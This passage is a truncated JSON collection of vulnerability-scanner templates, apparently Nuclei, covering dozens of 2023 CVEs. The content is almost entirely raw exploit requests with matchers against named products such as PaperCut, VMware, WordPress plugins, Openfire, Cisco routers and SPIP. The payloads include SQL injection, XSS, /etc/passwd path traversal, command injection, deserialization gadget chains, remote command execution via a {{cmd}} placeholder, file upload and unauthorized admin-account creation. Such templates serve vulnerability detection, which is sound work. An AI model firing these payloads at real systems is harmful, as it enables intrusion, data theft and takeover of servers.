application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25573","info":{"name":"Metersphere - Arbitrary File Read","severity":"high"},"requests":[{"raw":["POST /api/jmeter/download/files HTTP/1.1\nContent-Type: application/json\n\n{\"reportId\":\"{{str}}\",\"bodyFiles\":[{\"id\":\"{{rand}}\",\"name\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/etc/passwd"]},{"type":"word","part":"header","words":["filename=\"{{str}}.zip\"","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-2648","info":{"name":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{file}}.php.\"\nContent-Type: image/jpeg\n\n<?php echo md5('CVE-2023-2648');?>\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\n","POST /attachment/{{name}}/{{file}}.php  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["747711c62dffae7dbf726d8241bd07fe"]},{"type":"status","part":"body_2","status":[200]}],"extractors":[{"type":"regex","name":"name","part":"body","group":1,"regex":["([0-9]+)"],"internal":true}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo \"{{str2}}\"; ?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["body_5 == str2"]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-29622","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\")"],"condition":"and"}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39141","info":{"name":"Aria2 WebUI - Path traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/../../../../etc/passwd"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Aria2 WebUI\")","regex(\"root:x:0:0:\",body_2)"],"condition":"and"}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-20073","info":{"name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /index.html HTTP/1.1\nHost: {{Hostname}}\n","POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\nHost: {{Hostname}}\nAuthorization: 1\nContent-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"pathparam\"\n\nPortal\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"fileparam\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file.path\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file\"; filename=\"index.html\"\nContent-Type: application/octet-stream\n\n{{index}}\n{{html_comment}}\n\n--------------------------f6f99e26f3a45adf--\n","GET /index.html HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"dsl","name":"index","internal":true,"dsl":["body_1"]}],"matchers":[{"type":"word","part":"body_3","words":["{{html_comment}}"]}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register 